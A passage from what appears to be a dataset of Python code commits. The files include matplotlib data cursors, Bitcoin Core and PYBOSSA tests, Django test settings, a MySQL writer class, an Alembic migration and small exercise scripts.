        occupied until releasedata() is called for it.
        """
        if srvname not in self._srv:
            return None, None
        if self._srv[srvname]["begintime"] != 0 and len(self._srv[srvname]["processing"]) < self._srv[srvname]["maxcount"]:
            # materialise the next periodic slot and advance begintime
            nexttime = self._srv[srvname]["begintime"]
            interval = self._srv[srvname]["interval"]
            begintime = nexttime + interval
            begintime = int(begintime) - int(begintime) % interval
            self._srv[srvname]["begintime"] = begintime
            self._srv[srvname]["processing"][nexttime] = []
            self._srv[srvname]["processing"][nexttime].extend([(nexttime,), False])
        now = time.time()
        for k, v in self._srv[srvname]["processing"].iteritems():
            # hand out the first slot that is due (k < now) and free
            if k < now and not v[1]:
                v[1] = True
                return k, v[0]
        return None, None
if __name__ == "__main__":
    # Manual smoke test (Python 2 print statements): exercises the
    # init/get/release/set paths of scheddata.
    sd = scheddata()
    sd.initdata("slp1", time.time()-600, 5, 4)
    sd.initdata("slp2")
    sd.initdata("slp3", maxcount=10)
    print sd.displaydata()
    print "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"
    # unknown service -> (None, None)
    nt, srvlist = sd.getdata("slp10")
    print nt, srvlist
    print "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"
    nt, srvlist = sd.getdata("slp1")
    print nt, srvlist
    print "release", nt
    sd.releasedata("slp1", nt)
    nt, srvlist = sd.getdata("slp1")
    print nt, srvlist
    nt, srvlist = sd.getdata("slp1")
    print nt, srvlist
    nt, srvlist = sd.getdata("slp1")
    print nt, srvlist
    print sd.displaydata("slp1")
    nt, srvlist = sd.getdata("slp1")
    print nt, srvlist
    print "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"
    # slot 5s in the future: not due yet, due after sleeping 10s
    sd.setdata("slp2", time.time()+5, ())
    print sd.displaydata("slp2")
    nt, srvlist = sd.getdata("slp2")
    print nt, srvlist
    time.sleep(10)
    nt, srvlist = sd.getdata("slp2")
    print nt, srvlist
| Python | 0.000002 | |
b8784640d67bbf27c3c2ecd5a684d04d49af1f00 | add datacursors module | datacursors.py | datacursors.py | # This module offers two Cursors:
# * DataCursor,
# where you have to click the data point, and
# * FollowDotCursor,
# where the bubble is always on the point
# nearest to your pointer.
#
# All the code was copied from
# http://stackoverflow.com/a/13306887
# DataCursor Example
# x=[1,2,3,4,5]
# y=[6,7,8,9,10]
# fig = plt.figure()
# ax = fig.add_subplot(1, 1, 1)
# scat = ax.scatter(x, y)
# DataCursor(scat, x, y)
# plt.show()
# FollowDotCursor Example
# x=[1,2,3,4,5]
# y=[6,7,8,9,10]
# fig = plt.figure()
# ax = fig.add_subplot(1, 1, 1)
# ax.scatter(x, y)
# cursor = FollowDotCursor(ax, x, y)
# plt.show()
import numpy as np
import matplotlib.pyplot as plt
import scipy.spatial as spatial
import matplotlib.mlab as mlab
import matplotlib.cbook as cbook
def fmt(x, y):
    """Render a coordinate pair as the two-line annotation label."""
    return 'x: {:0.2f}\ny: {:0.2f}'.format(x, y)
# http://stackoverflow.com/a/4674445/190597
class DataCursor(object):
    """A simple data cursor widget that displays the x,y location of a
    matplotlib artist when it is selected."""
    def __init__(self, artists, x = [], y = [], tolerance = 5, offsets = (-20, 20),
                 formatter = fmt, display_all = False):
        """Create the data cursor and connect it to the relevant figure.
        "artists" is the matplotlib artist or sequence of artists that will be
            selected.
        "tolerance" is the radius (in points) that the mouse click must be
            within to select the artist.
        "offsets" is a tuple of (x,y) offsets in points from the selected
            point to the displayed annotation box
        "formatter" is a callback function which takes 2 numeric arguments and
            returns a string
        "display_all" controls whether more than one annotation box will
            be shown if there are multiple axes.  Only one will be shown
            per-axis, regardless.
        """
        # NOTE(review): the mutable defaults x=[], y=[] are shared between
        # calls; harmless here since they are only read, never mutated.
        self._points = np.column_stack((x,y))
        self.formatter = formatter
        self.offsets = offsets
        self.display_all = display_all
        if not cbook.iterable(artists):
            artists = [artists]
        self.artists = artists
        # deduplicated axes/figures the artists live on
        self.axes = tuple(set(art.axes for art in self.artists))
        self.figures = tuple(set(ax.figure for ax in self.axes))

        # one (initially hidden) annotation box per axis
        self.annotations = {}
        for ax in self.axes:
            self.annotations[ax] = self.annotate(ax)
        for artist in self.artists:
            artist.set_picker(tolerance)
        for fig in self.figures:
            fig.canvas.mpl_connect('pick_event', self)

    def annotate(self, ax):
        """Draws and hides the annotation box for the given axis "ax"."""
        annotation = ax.annotate(self.formatter, xy = (0, 0), ha = 'right',
                xytext = self.offsets, textcoords = 'offset points', va = 'bottom',
                bbox = dict(boxstyle = 'round,pad=0.5', fc = 'yellow', alpha = 0.5),
                arrowprops = dict(arrowstyle = '->', connectionstyle = 'arc3,rad=0')
                )
        annotation.set_visible(False)
        return annotation

    def snap(self, x, y):
        """Return the value in self._points closest to (x, y).
        """
        # nanargmin ignores NaN distances; metric is squared Euclidean
        idx = np.nanargmin(((self._points - (x,y))**2).sum(axis = -1))
        return self._points[idx]

    def __call__(self, event):
        """Intended to be called through "mpl_connect"."""
        # Rather than trying to interpolate, just display the clicked coords
        # This will only be called if it's within "tolerance", anyway.
        x, y = event.mouseevent.xdata, event.mouseevent.ydata
        annotation = self.annotations[event.artist.axes]
        if x is not None:
            if not self.display_all:
                # Hide any other annotation boxes...
                for ann in self.annotations.values():
                    ann.set_visible(False)
            # Update the annotation in the current axis..
            x, y = self.snap(x, y)
            annotation.xy = x, y
            annotation.set_text(self.formatter(x, y))
            annotation.set_visible(True)
            event.canvas.draw()
class FollowDotCursor(object):
    """Display the x,y location of the data point nearest the mouse.

    A green dot tracks the nearest stored point and an annotation box shows
    its coordinates, updated on every mouse-motion event.
    """
    def __init__(self, ax, x, y, tolerance=5, formatter=fmt, offsets=(-20, 20)):
        try:
            x = np.asarray(x, dtype='float')
        except (TypeError, ValueError):
            # Non-numeric x (e.g. dates): convert via matplotlib.  Imported
            # lazily here -- and this fixes a bug: `mdates` was referenced
            # without ever being imported, so date input raised NameError.
            import matplotlib.dates as mdates
            x = np.asarray(mdates.date2num(x), dtype='float')
        y = np.asarray(y, dtype='float')
        self._points = np.column_stack((x, y))
        self.offsets = offsets
        # Scale x so the KD-tree's notion of "nearest" accounts for the
        # differing x/y data ranges.
        self.scale = x.ptp()
        self.scale = y.ptp() / self.scale if self.scale else 1
        self.tree = spatial.cKDTree(self.scaled(self._points))
        self.formatter = formatter
        self.tolerance = tolerance
        self.ax = ax
        self.fig = ax.figure
        self.ax.xaxis.set_label_position('top')
        self.dot = ax.scatter(
            [x.min()], [y.min()], s=130, color='green', alpha=0.7)
        self.annotation = self.setup_annotation()
        plt.connect('motion_notify_event', self)

    def scaled(self, points):
        """Apply the x scale factor used for the KD-tree distance metric."""
        points = np.asarray(points)
        return points * (self.scale, 1)

    def __call__(self, event):
        """Mouse-motion callback: snap to the nearest point and redraw."""
        ax = self.ax
        # event.inaxes is always the current axis. If you use twinx, ax could be
        # a different axis.
        if event.inaxes == ax:
            x, y = event.xdata, event.ydata
        elif event.inaxes is None:
            return
        else:
            # Convert from display coordinates into this axis' data space.
            inv = ax.transData.inverted()
            x, y = inv.transform([(event.x, event.y)]).ravel()
        annotation = self.annotation
        x, y = self.snap(x, y)
        annotation.xy = x, y
        annotation.set_text(self.formatter(x, y))
        self.dot.set_offsets((x, y))
        # (removed an unused `bbox = ax.viewLim` local)
        event.canvas.draw()

    def setup_annotation(self):
        """Draw and hide the annotation box."""
        annotation = self.ax.annotate(
            '', xy=(0, 0), ha = 'right',
            xytext = self.offsets, textcoords = 'offset points', va = 'bottom',
            bbox = dict(
                boxstyle='round,pad=0.5', fc='yellow', alpha=0.75),
            arrowprops = dict(
                arrowstyle='->', connectionstyle='arc3,rad=0'))
        return annotation

    def snap(self, x, y):
        """Return the value in self.tree closest to x, y (Manhattan metric, p=1)."""
        dist, idx = self.tree.query(self.scaled((x, y)), k=1, p=1)
        try:
            return self._points[idx]
        except IndexError:
            # IndexError: index out of bounds
            return self._points[0]
| Python | 0.000001 | |
e69da5fb3550703c466cd8ec0e084e131fb97150 | add first small and simple tests about the transcoder manager | coherence/test/test_transcoder.py | coherence/test/test_transcoder.py |
from twisted.trial.unittest import TestCase
from coherence.transcoder import TranscoderManager
from coherence.transcoder import (PCMTranscoder, WAVTranscoder, MP3Transcoder,
MP4Transcoder, MP2TSTranscoder, ThumbTranscoder)
known_transcoders = [PCMTranscoder, WAVTranscoder, MP3Transcoder, MP4Transcoder,
MP2TSTranscoder, ThumbTranscoder]
# move this into the implementation to allow easier overwriting
def getuniquename(transcoder_class):
    """Return the identifier under which a transcoder class is registered."""
    # Plain attribute access; equivalent to getattr(transcoder_class, 'id').
    return transcoder_class.id
class TranscoderTestMixin(object):
    """Gives each test a fresh TranscoderManager and resets the singleton."""

    def setUp(self):
        self.manager = TranscoderManager()

    def tearDown(self):
        # as it is a singleton ensuring that we always get a clean
        # and fresh one is tricky and hacks the internals
        TranscoderManager._instance = None
        del self.manager
class TestTranscoderManagerSingletony(TranscoderTestMixin, TestCase):
    """Checks the singleton behaviour of TranscoderManager."""

    def test_is_really_singleton(self):
        #FIXME: singleton tests should be outsourced some when
        # A second instantiation must return the very same object.
        old_id = id(self.manager)
        new_manager = TranscoderManager()
        self.assertEquals(old_id, id(new_manager))
class TestTranscoderAutoloading(TranscoderTestMixin, TestCase):
    """Checks that the manager registers all known transcoders on creation."""

    def setUp(self):
        # Override the mixin's setUp: the manager must be constructed inside
        # the test so the loading itself is what is observed.
        self.manager = None

    def test_is_loading_all_known_transcoders(self):
        self.manager = TranscoderManager()
        for klass in known_transcoders:
            self.assertEquals(self.manager.transcoders[getuniquename(klass)], klass)
| Python | 0 | |
d1958e834182fd7d43b97ea17057cc19dff21ca1 | Test addr response caching | test/functional/p2p_getaddr_caching.py | test/functional/p2p_getaddr_caching.py | #!/usr/bin/env python3
# Copyright (c) 2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test addr response caching"""
import time
from test_framework.messages import (
CAddress,
NODE_NETWORK,
msg_addr,
msg_getaddr,
)
from test_framework.p2p import (
P2PInterface,
p2p_lock
)
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import (
assert_equal,
)
MAX_ADDR_TO_SEND = 1000
def gen_addrs(n):
    """Generate n service-flagged CAddress objects spread over many /16 nets.

    The first two IP octets encode the index (i >> 8, i % 256) so addresses
    land in different AddrMan buckets.
    """
    result = []
    for i in range(n):
        addr = CAddress()
        addr.time = int(time.time())
        addr.nServices = NODE_NETWORK
        # Use first octets to occupy different AddrMan buckets
        addr.ip = "{}.{}.1.1".format(i >> 8, i % 256)
        addr.port = 8333
        result.append(addr)
    return result
class AddrReceiver(P2PInterface):
    """P2P connection that records the IPs from the last addr message."""

    def __init__(self):
        super().__init__()
        # list of ip strings from the most recent addr message, or None if
        # no addr message has arrived yet
        self.received_addrs = None

    def get_received_addrs(self):
        """Thread-safe accessor for the recorded addresses."""
        with p2p_lock:
            return self.received_addrs

    def on_addr(self, message):
        # Overwrites (does not extend) on every addr message received.
        self.received_addrs = []
        for addr in message.addrs:
            self.received_addrs.append(addr.ip)

    def addr_received(self):
        """Predicate for wait_until(): has any addr message arrived?"""
        return self.received_addrs is not None
class AddrTest(BitcoinTestFramework):
    """Checks that getaddr responses are cached and eventually refreshed."""

    def set_test_params(self):
        self.setup_clean_chain = False
        self.num_nodes = 1

    def run_test(self):
        self.log.info('Create connection that sends and requests addr '
                      'messages')
        addr_source = self.nodes[0].add_p2p_connection(P2PInterface())

        msg_send_addrs = msg_addr()
        self.log.info('Fill peer AddrMan with a lot of records')
        # Since these addrs are sent from the same source, not all of them
        # will be stored, because we allocate a limited number of AddrMan
        # buckets per addr source.
        total_addrs = 10000
        addrs = gen_addrs(total_addrs)
        # Send the addresses in MAX_ADDR_TO_SEND-sized batches.
        for i in range(int(total_addrs / MAX_ADDR_TO_SEND)):
            msg_send_addrs.addrs = addrs[i * MAX_ADDR_TO_SEND:
                                         (i + 1) * MAX_ADDR_TO_SEND]
            addr_source.send_and_ping(msg_send_addrs)

        responses = []
        self.log.info('Send many addr requests within short time to receive')

        N = 5
        cur_mock_time = int(time.time())
        for i in range(N):
            addr_receiver = self.nodes[0].add_p2p_connection(AddrReceiver())
            addr_receiver.send_and_ping(msg_getaddr())
            # Trigger response by advancing mock time
            cur_mock_time += 5 * 60
            self.nodes[0].setmocktime(cur_mock_time)
            addr_receiver.wait_until(addr_receiver.addr_received)
            responses.append(addr_receiver.get_received_addrs())
        # Within the cache window all responses must be identical (served
        # from the cache) and smaller than a full addr message.
        for response in responses[1:]:
            assert_equal(response, responses[0])
            assert(len(response) < MAX_ADDR_TO_SEND)

        # Jump far ahead (3 days) so the cached response expires.
        cur_mock_time += 3 * 24 * 60 * 60
        self.nodes[0].setmocktime(cur_mock_time)

        self.log.info('After time passed, see a new response to addr request')
        last_addr_receiver = self.nodes[0].add_p2p_connection(AddrReceiver())
        last_addr_receiver.send_and_ping(msg_getaddr())
        # Trigger response
        cur_mock_time += 5 * 60
        self.nodes[0].setmocktime(cur_mock_time)
        last_addr_receiver.wait_until(last_addr_receiver.addr_received)
        # new response is different
        assert(set(responses[0]) !=
               set(last_addr_receiver.get_received_addrs()))


if __name__ == '__main__':
    AddrTest().main()
| Python | 0.000201 | |
9698e473615233819f886c5c51220d3a213b5545 | Add initial prototype | script.py | script.py | #!/usr/bin/env python
import sys
import subprocess as subp
cmd = '' if len(sys.argv) <= 1 else str(sys.argv[1])
if cmd in ['prev', 'next']:
log = subp.check_output(['git', 'rev-list', '--all']).strip()
log = [line.strip() for line in log.split('\n')]
pos = subp.check_output(['git', 'rev-parse', 'HEAD']).strip()
idx = log.index(pos)
# Next commit:
if cmd == 'next':
if idx > 0:
subp.call(['git', 'checkout', log[idx - 1]])
else:
print("You're already on the latest commit.")
# Previous commit:
else:
if idx + 1 <= len(log) - 1:
subp.call(['git', 'checkout', 'HEAD^'])
else:
print("You're already on the first commit.")
else:
print('Usage: git walk prev|next')
| Python | 0.000002 | |
6500bc2682aeecb29c79a9ee9eff4e33439c2b49 | Add verifica_diff script | conjectura/teste/verifica_diff.py | conjectura/teste/verifica_diff.py | from sh import cp, rm, diff
import sh
import os
SURSA_VERIFICATA = 'conjectura-inturi.cpp'
cp('../' + SURSA_VERIFICATA, '.')
os.system('g++ ' + SURSA_VERIFICATA)
filename = 'grader_test'
for i in range(1, 11):
print 'Testul ', i
cp(filename + str(i) + '.in', 'conjectura.in')
os.system('./a.out')
print diff('conjectura.out', filename + str(i) + '.ok')
for extension in ['in', 'out']:
rm('conjectura.' + extension)
rm(SURSA_VERIFICATA)
rm('a.out')
| Python | 0.000001 | |
5d769d651947384e18e4e9c21a10f86762a3e950 | add more tests | test/test_api/test_api_announcement.py | test/test_api/test_api_announcement.py | # -*- coding: utf8 -*-
# This file is part of PYBOSSA.
#
# Copyright (C) 2017 Scifabric LTD.
#
# PYBOSSA is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# PYBOSSA is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with PYBOSSA. If not, see <http://www.gnu.org/licenses/>.
import json
from default import db, with_context
from test_api import TestAPI
from factories import AnnouncementFactory
from factories import UserFactory, HelpingMaterialFactory, ProjectFactory
from pybossa.repositories import AnnouncementRepository
from mock import patch
announcement_repo = AnnouncementRepository(db)
class TestAnnouncementAPI(TestAPI):
    """Tests for the /announcements/ REST endpoint."""

    @with_context
    def test_query_announcement(self):
        """Test API query for announcement endpoint works"""
        # Factory fixtures are created for their DB side effects; the local
        # variables themselves are otherwise unused.
        owner = UserFactory.create()
        user = UserFactory.create()
        # project = ProjectFactory(owner=owner)
        announcements = AnnouncementFactory.create_batch(9)
        announcement = AnnouncementFactory.create()
        # As anon: 9 batched + 1 single announcement = 10 expected
        url = '/announcements/'
        res = self.app_get_json(url)
        data = json.loads(res.data)
        assert len(data['announcements']) == 10, data
| Python | 0 | |
18b22600f94be0e6fedd6bb202753736d61c85e6 | Add alternative settings to make test debugging easier | runserver_settings.py | runserver_settings.py | from django.conf import global_settings
import os
SITE_ID = 1
TIME_ZONE = 'Europe/Amsterdam'
PROJECT_ROOT = os.path.join(os.path.dirname(__file__))
MEDIA_ROOT = os.path.join(PROJECT_ROOT, 'bluebottle', 'test_files', 'media')
STATIC_ROOT = os.path.join(PROJECT_ROOT, 'bluebottle', 'test_files', 'assets')
STATICI18N_ROOT = os.path.join(PROJECT_ROOT, 'bluebottle', 'test_files', 'global')
STATICFILES_DIRS = (
(os.path.join(PROJECT_ROOT, 'bluebottle', 'test_files', 'global')),
)
STATIC_URL = '/static/assets/'
MEDIA_URL = '/static/media/'
COMPRESS_ENABLED = False # = True: causes tests to be failing for some reason
STATICFILES_FINDERS = [
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
# django-compressor staticfiles
'compressor.finders.CompressorFinder',
]
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(PROJECT_ROOT, 'bluebottle', 'test_files', 'test.db'),
# 'NAME': ':memory:',
}
}
SECRET_KEY = '$311#0^-72hr(uanah5)+bvl4)rzc*x1&b)6&fajqv_ae6v#zy'
INSTALLED_APPS = (
# Django apps
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.staticfiles',
#3rp party apps
'compressor',
'registration',
'rest_framework',
'social_auth',
'south',
'taggit',
'templatetag_handlebars',
# Bluebottle apps
'bluebottle.accounts',
'bluebottle.common',
'bluebottle.geo',
)
MIDDLEWARE_CLASSES = [
# Have a middleware to make sure old cookies still work after we switch to domain-wide cookies.
'bluebottle.bluebottle_utils.middleware.SubDomainSessionMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# https://docs.djangoproject.com/en/1.4/ref/clickjacking/
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.transaction.TransactionMiddleware',
]
TEMPLATE_DIRS = (
os.path.join(PROJECT_ROOT, 'bluebottle', 'test_files', 'templates'),
)
TEMPLATE_LOADERS = [
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
'apptemplates.Loader', # extend AND override templates
]
TEMPLATE_CONTEXT_PROCESSORS = global_settings.TEMPLATE_CONTEXT_PROCESSORS + (
# Makes the 'request' variable (the current HttpRequest) available in templates.
'django.core.context_processors.request',
'django.core.context_processors.i18n'
)
AUTH_USER_MODEL = 'accounts.BlueBottleUser'
ROOT_URLCONF = 'bluebottle.urls'
SESSION_COOKIE_NAME = 'bb-session-id'
# Django-registration settings
ACCOUNT_ACTIVATION_DAYS = 4
HTML_ACTIVATION_EMAIL = True # Note this setting is from our forked version.
SOUTH_TESTS_MIGRATE = False # Make south shut up during tests
SELENIUM_TESTS = True
SELENIUM_WEBDRIVER = 'phantomjs' # Can be any of chrome, firefox, phantomjs
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
DEBUG = True
TEMPLATE_DEBUG = True
USE_EMBER_STYLE_ATTRS = True | Python | 0 | |
3a1f37ea0e46ea396c2ce407a938677e86dc6655 | Adding a test Hello World | hello_world.py | hello_world.py | print "Hello World !"
| Python | 0.999909 | |
a1f411be91a9db2193267de71eb52db2f334641b | add a file that prints hello lesley | hellolesley.py | hellolesley.py | #This is my hello world program to say hi to Lesley
print 'Hello Lesley'
| Python | 0.000258 | |
03b80665f6db39002e0887ddf56975f6d31cc767 | Create __init__.py | server/__init__.py | server/__init__.py | Python | 0.000429 | ||
33581b5a2f9ca321819abfd7df94eb5078ab3e7c | Add domain.Box bw compatibility shim w/deprecation warning | lepton/domain.py | lepton/domain.py | #############################################################################
#
# Copyright (c) 2008 by Casey Duncan and contributors
# All Rights Reserved.
#
# This software is subject to the provisions of the MIT License
# A copy of the license should accompany this distribution.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
#
#############################################################################
"""Domains represent regions of space and are used for generating vectors
(positions, velocities, colors). Domains are also used by controllers to test
for collision. Colliding with domains can then influence particle
behavior
"""
__version__ = '$Id$'
from random import random, uniform
from math import sqrt
from particle_struct import Vec3
from _domain import Line, Plane, AABox, Sphere
class Domain(object):
    """Abstract base class for all domains.

    Concrete domains must implement point generation, containment testing
    and surface intersection.
    """

    def generate(self):
        """Return a point within the domain as a 3-tuple.

        For domains with a non-zero volume, 'point in domain' is guaranteed
        to return true for the generated point.
        """
        raise NotImplementedError

    def __contains__(self, point):
        """Return True if point is inside the domain, False otherwise."""
        raise NotImplementedError

    def intersect(self, start_point, end_point):
        """Intersect a line segment with the domain surface.

        Given start and end points (coordinate 3-tuples), return a 2-tuple
        of the intersection point closest to the start point and the surface
        normal unit vector there.  Return (None, None) when the segment does
        not intersect the domain.  Only 2- or 3-dimensional domains may be
        intersected, and approximations are acceptable: performance matters
        more than absolute accuracy here.
        """
        raise NotImplementedError
def Box(*args, **kw):
    """Axis-aligned box domain (same as AABox for now)

    WARNING: Deprecated, use AABox instead. This domain will mean something different
    in future versions of lepton
    """
    import warnings
    message = ("lepton.domain.Box is deprecated, use AABox instead. "
               "This domain class will mean something different in future versions of lepton")
    # stacklevel=2 points the warning at the caller, not at this shim
    warnings.warn(message, stacklevel=2)
    return AABox(*args, **kw)
| #############################################################################
#
# Copyright (c) 2008 by Casey Duncan and contributors
# All Rights Reserved.
#
# This software is subject to the provisions of the MIT License
# A copy of the license should accompany this distribution.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
#
#############################################################################
"""Domains represent regions of space and are used for generating vectors
(positions, velocities, colors). Domains are also used by controllers to test
for collision. Colliding with domains can then influence particle
behavior
"""
__version__ = '$Id$'
from random import random, uniform
from math import sqrt
from particle_struct import Vec3
from _domain import Line, Plane, AABox, Sphere
class Domain(object):
"""Domain abstract base class"""
def generate(self):
"""Return a point within the domain as a 3-tuple. For domains with a
non-zero volume, 'point in domain' is guaranteed to return true.
"""
raise NotImplementedError
def __contains__(self, point):
"""Return true if point is inside the domain, false if not."""
raise NotImplementedError
def intersect(self, start_point, end_point):
"""For the line segment defined by the start and end point specified
(coordinate 3-tuples), return the point closest to the start point
where the line segment intersects surface of the domain, and the
surface normal unit vector at that point as a 2-tuple. If the line
segment does not intersect the domain, return the 2-tuple (None,
None).
Only 2 or 3 dimensional domains may be intersected.
Note performance is more important than absolute accuracy with this
method, so approximations are acceptable.
"""
raise NotImplementedError
| Python | 0 |
03fdc41437f96cb1d6ba636c3a5d8c5dc15430b1 | Create requirements.py | requirements.py | requirements.py | Python | 0 | ||
ab99f855f708dec213c9eea1489643c01526e0b0 | Add unittests for bridgedb.parse.versions module. | lib/bridgedb/test/test_parse_versions.py | lib/bridgedb/test/test_parse_versions.py | # -*- coding: utf-8 -*-
#_____________________________________________________________________________
#
# This file is part of BridgeDB, a Tor bridge distribution system.
#
# :authors: Isis Lovecruft 0xA3ADB67A2CDB8B35 <isis@torproject.org>
# please also see AUTHORS file
# :copyright: (c) 2014, The Tor Project, Inc.
# (c) 2014, Isis Lovecruft
# :license: see LICENSE for licensing information
#_____________________________________________________________________________
"""Unittests for :mod:`bridgedb.parse.versions`."""
from __future__ import print_function
from twisted.trial import unittest
from bridgedb.parse import versions
class ParseVersionTests(unittest.TestCase):
    """Unit tests for :class:`bridgedb.parse.versions.Version`."""

    def test_Version_with_bad_delimiter(self):
        """A version string delimited with '-' should be rejected."""
        self.assertRaises(versions.InvalidVersionStringFormat,
                          versions.Version, '2-6-0', package='tor')

    def test_Version_really_long_version_string(self):
        """An overly long version string still parses; the internal
        IndexError is swallowed by the parser.
        """
        version = versions.Version('2.6.0.0.beta', package='tor')
        self.assertEqual(version.prerelease, 'beta')
        self.assertEqual(version.major, 6)

    def test_Version_string(self):
        """A valid Version object should round-trip back to string form."""
        version = versions.Version('0.2.5.4', package='tor')
        self.assertEqual(version.base(), '0.2.5.4')
caef0059d803fc885d268ccd66b9c70a0b2ab129 | Create Exercise4_VariablesAndNames.py | Exercise4_VariablesAndNames.py | Exercise4_VariablesAndNames.py | # Exercise 4 : Variables and Names
cars = 100
space_in_a_car = 4.0
drivers = 30
passengers = 90
cars_not_driven = cars - drivers
cars_driven = drivers
carpool_capacity = cars_driven * space_in_a_car
average_passengers_per_cars = passengers / cars_driven
print("There are", cars, "cars available.")
print("There are only", drivers, "drivers available.")
print("There will be", cars_not_driven, "empty cars today.")
print("We can transport", carpool_capacity, "people today.")
print("We have", passengers, "to carpool today.")
print("We need to put about", average_passengers_per_cars, "in each car.")
| Python | 0 | |
7b00bbb576df647a74b47b601beff02af308d16a | 添加 输出到 MySQL | src/target/mysql.py | src/target/mysql.py | # -*- coding: utf-8 -*-
# Author: mojiehua
# Email: mojh@ibbd.net
# Created Time: 2017-07-18 17:38:44
import pymysql
class Target:
    """Write rows into a MySQL database.

    The target table must be created beforehand and its columns must match
    the fields of the rows being written.

    Supported configuration parameters (``params``):
        host: MySQL host address
        port: MySQL port (optional, defaults to 3306)
        user: user name
        passwd: password
        db: database name
        table: table name
        charset: character set (optional, defaults to utf8)

    Example configuration::

        params:
            host: 127.0.0.1
            port: 3306
            user: root
            passwd: root
            db: test
            charset: utf8
            table: testmysql
            batch: true
            batchNum: 1000
    """
    # Class-level default; shadowed by the instance attribute set in __init__.
    params = {}
    def __init__(self, params):
        # NOTE: mutates the caller's ``params`` dict when filling in the
        # charset/port defaults.
        params['charset'] = params['charset'] if 'charset' in params else 'utf8'
        params['port'] = int(params['port']) if 'port' in params else 3306
        self.params = params
        self._host = params['host']
        self._port = params['port']
        self._user = params['user']
        self._passwd = params['passwd']
        self._db = params['db']
        self._charset = params['charset']
        self._table = params['table']
        # Connection and cursor are opened lazily on the first write/batch.
        self._conn = None
        self._cursor = None
    def get_conn(self):
        """Open and return a new pymysql connection; prints a diagnostic
        and re-raises on failure."""
        try:
            conn = pymysql.connect(host = self._host,
                                   port = self._port,
                                   user = self._user,
                                   passwd = self._passwd,
                                   db = self._db,
                                   charset = self._charset)
            return conn
        except Exception as e:
            print('数据库连接出错',e)
            raise e
    def write(self, row):
        """Insert one row (a field-name -> value mapping), committing
        immediately. Failed inserts are logged and skipped."""
        if self._conn is None:
            self._conn = self.get_conn()
            self._cursor = self._conn.cursor()
        sql = self.constructSQLByRow(row)
        try:
            self._cursor.execute(sql,(list(row.values())))
            self._conn.commit()
        except Exception as e:
            print(e)
            print('插入数据库出错,忽略此条记录',row)
    def constructSQLByRow(self,row):
        """Build a parameterized INSERT statement for ``row``.

        Relies on row.keys() and row.values() iterating in matching order,
        which Python guarantees for an unmodified dict.
        """
        fields = ','.join(row.keys())
        values = ','.join(['%s' for _ in row.values()])
        sql = '''INSERT INTO {tb}({column}) VALUES ({values}) '''.format(tb=self._table,column=fields,values=values)
        return sql
    def batch(self, rows):
        """Insert many rows with a single commit at the end (unlike
        write(), which commits per row). Failed rows are logged and
        skipped."""
        if self._conn is None:
            self._conn = self.get_conn()
            self._cursor = self._conn.cursor()
        for row in rows:
            try:
                sql = self.constructSQLByRow(row)
                self._cursor.execute(sql,(list(row.values())))
            except Exception as e:
                print(e)
                print('插入数据库出错,忽略此条记录',row)
        self._conn.commit()
    def __del__(self):
        # Best-effort cleanup. NOTE(review): raises AttributeError if
        # __init__ failed before _conn/_cursor were assigned -- confirm
        # acceptable.
        if self._cursor:
            self._cursor.close()
        if self._conn:
            self._conn.close()
| Python | 0.000001 | |
1a4db50c848a3e7bb1323ae9e6b26c884187c575 | Add my fibonacci sequence homework. | training/level-1-the-zen-of-python/dragon-warrior/fibonacci/rwharris-nd_fibonacci.py | training/level-1-the-zen-of-python/dragon-warrior/fibonacci/rwharris-nd_fibonacci.py | def even_fibonacci_sum(a:int,b:int,max:int) -> int:
temp = 0
sum = 0
while (b <= max):
if (b%2 == 0):
sum += b
temp = a + b
a = b
b = temp
print(sum)
even_fibonacci_sum(1,2,4000000) | Python | 0.000003 | |
f14c483283984b793f1209255e059d7b9deb414c | Add in the db migration | migrations/versions/8081a5906af_.py | migrations/versions/8081a5906af_.py | """empty message
Revision ID: 8081a5906af
Revises: 575d8824e34c
Create Date: 2015-08-25 18:04:56.738898
"""
# revision identifiers, used by Alembic.
revision = '8081a5906af'
down_revision = '575d8824e34c'
from alembic import op
import sqlalchemy as sa
def upgrade():
    """Apply the migration: add a nullable ``member_count`` integer column
    to the ``organization`` table."""
    ### commands auto generated by Alembic - please adjust! ###
    op.add_column('organization', sa.Column('member_count', sa.Integer(), nullable=True))
    ### end Alembic commands ###
def downgrade():
    """Revert the migration: drop ``organization.member_count``."""
    ### commands auto generated by Alembic - please adjust! ###
    op.drop_column('organization', 'member_count')
    ### end Alembic commands ###
| Python | 0.000001 | |
